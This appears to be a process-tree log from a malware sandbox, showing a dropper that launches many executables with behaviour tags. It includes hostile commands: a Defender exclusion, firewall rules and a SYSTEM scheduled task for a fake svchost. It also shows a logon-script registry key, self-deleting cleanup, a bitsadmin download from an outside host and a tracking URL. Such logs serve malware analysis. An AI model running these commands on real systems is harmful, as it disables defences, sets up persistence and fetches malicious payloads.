C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im VEa4XNX37VROBVrK80k5VxkO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\VEa4XNX37VROBVrK80k5VxkO.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im VEa4XNX37VROBVrK80k5VxkO.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\aj1qRBbUcTuprnRCEvZjOudA.exe"C:\Users\Admin\Pictures\Adobe Films\aj1qRBbUcTuprnRCEvZjOudA.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 6603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 6963⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 6483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 7123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 11363⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"C:\Users\Admin\Pictures\Adobe Films\omVlxP3RfKIM3eS4IizTb8IP.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 8764⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\RD8KFq6f5QViwV0MrTou3rpZ.exe"C:\Users\Admin\Pictures\Adobe Films\RD8KFq6f5QViwV0MrTou3rpZ.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"C:\Users\Admin\Pictures\Adobe Films\GmsDXcf5_0hLpT8X9au5MwZp.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Y7B85KyvjK4STp4RCLBO190o.exe"C:\Users\Admin\Pictures\Adobe Films\Y7B85KyvjK4STp4RCLBO190o.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\fEbcFuzCW9Be1RqlDsqMbCAi.exe"C:\Users\Admin\Pictures\Adobe Films\fEbcFuzCW9Be1RqlDsqMbCAi.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"C:\Users\Admin\Pictures\Adobe Films\r3FYzQQodjD253E15m9ZD5ze.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\AecmysbzIXMVq1dRFsqTK8lb.exe"C:\Users\Admin\Pictures\Adobe Films\AecmysbzIXMVq1dRFsqTK8lb.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe"C:\Users\Admin\Pictures\Adobe Films\xWNdnVltEX96FstYNvLHfW1j.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x19c,0x1e8,0x7ffd78ebdec0,0x7ffd78ebded0,0x7ffd78ebdee05⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2528 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2620 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=2016 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=2004 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1928 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=3268 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1928 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=3312 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=1900 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=1820 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1912,7927506742586482460,9677828054985461870,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_1816232150" --mojo-platform-channel-handle=2900 /prefetch:85⤵
-
C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exe"C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-DGEAD.tmp\x7X0Exp5JXLQiSV9Bd8veIvG.tmp"C:\Users\Admin\AppData\Local\Temp\is-DGEAD.tmp\x7X0Exp5JXLQiSV9Bd8veIvG.tmp" /SL5="$7003A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\x7X0Exp5JXLQiSV9Bd8veIvG.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-HNQSA.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-HNQSA.tmp\DYbALA.exe" /S /UID=27102⤵
- Executes dropped EXE
-
C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe"C:\Program Files\Mozilla Firefox\AMTMFOCQMW\foldershare.exe" /VERYSILENT3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\be-4394e-205-9eba5-f133f0011a784\Wysadudaecu.exe"C:\Users\Admin\AppData\Local\Temp\be-4394e-205-9eba5-f133f0011a784\Wysadudaecu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\36-7c6f5-6bf-62795-996f3971620a5\Mipijaedila.exe"C:\Users\Admin\AppData\Local\Temp\36-7c6f5-6bf-62795-996f3971620a5\Mipijaedila.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exeC:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe SID=778 CID=778 SILENT=1 /quiet5⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\0cwqjy3r.2kg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654211 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1dgzhby.heg\GcleanerEU.exe /eufive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\v1dgzhby.heg\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\v1dgzhby.heg\GcleanerEU.exe /eufive5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmwvfgqr.pbs\installer.exe /qn CAMPAIGN="654" & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\cmwvfgqr.pbs\installer.exeC:\Users\Admin\AppData\Local\Temp\cmwvfgqr.pbs\installer.exe /qn CAMPAIGN="654"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwmc5y1e.ba2\any.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\uwmc5y1e.ba2\any.exeC:\Users\Admin\AppData\Local\Temp\uwmc5y1e.ba2\any.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\by5insby.q0n\customer51.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\by5insby.q0n\customer51.exeC:\Users\Admin\AppData\Local\Temp\by5insby.q0n\customer51.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb4gjppl.s22\gcleaner.exe /mixfive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\qb4gjppl.s22\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\qb4gjppl.s22\gcleaner.exe /mixfive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 8886⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 8046⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe /verysilent & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exeC:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe /verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AT8K8.tmp\FastPC.tmp"C:\Users\Admin\AppData\Local\Temp\is-AT8K8.tmp\FastPC.tmp" /SL5="$10506,138429,56832,C:\Users\Admin\AppData\Local\Temp\asu0teii.q0y\FastPC.exe" /verysilent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PLUG3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PLUG3.tmp\Setup.exe" /Verysilent7⤵
-
C:\Program Files (x86)\FastPc\FastPc\Fast.exe"C:\Program Files (x86)\FastPc\FastPc\Fast.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Fast.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\FastPc\FastPc\Fast.exe" & del C:\ProgramData\*.dll & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Fast.exe /f10⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 610⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"8⤵
-
C:\Program Files (x86)\FastPc\FastPc\Faster.exe"C:\Program Files (x86)\FastPc\FastPc\Faster.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"9⤵
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7219⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SK6CP.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-SK6CP.tmp\IBInstaller_74449.tmp" /SL5="$601B0,17039402,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72110⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\microsoft.cab -F:* %ProgramData%11⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\microsoft.cab -F:* C:\ProgramData12⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\vdi_compiler"11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-PN8VP.tmp\{app}\vdi_compiler.exe"12⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 413⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://coeplorfd234.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=72111⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=7209⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NTV87.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-NTV87.tmp\vpn.tmp" /SL5="$306A4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=72010⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "11⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090112⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall11⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install11⤵
-
C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe"C:\Users\Admin\AppData\Local\Temp\Settings Installation.exe" SID=775 SID CID=775 SILENT=1 /quiet9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zn2v1xe5.cdx\autosubplayer.exe /S & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\zn2v1xe5.cdx\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\zn2v1xe5.cdx\autosubplayer.exe /S5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsj93C3.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z6⤵
- Download via BitsAdmin
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjcjk1w5.bce\installer.exe /qn CAMPAIGN=654 & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\tjcjk1w5.bce\installer.exeC:\Users\Admin\AppData\Local\Temp\tjcjk1w5.bce\installer.exe /qn CAMPAIGN=6545⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Users\Admin\AppData\Local\Temp\A53B.exeC:\Users\Admin\AppData\Local\Temp\A53B.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\A53B.exeC:\Users\Admin\AppData\Local\Temp\A53B.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Users\Admin\AppData\Local\Temp\379.exeC:\Users\Admin\AppData\Local\Temp\379.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\19D1.exeC:\Users\Admin\AppData\Local\Temp\19D1.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\252C.exeC:\Users\Admin\AppData\Local\Temp\252C.exe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\73F9.exeC:\Users\Admin\AppData\Local\Temp\73F9.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\8C54.exeC:\Users\Admin\AppData\Local\Temp\8C54.exe1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8C54.exeC:\Users\Admin\AppData\Local\Temp\8C54.exe2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\BCBC.exeC:\Users\Admin\AppData\Local\Temp\BCBC.exe1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
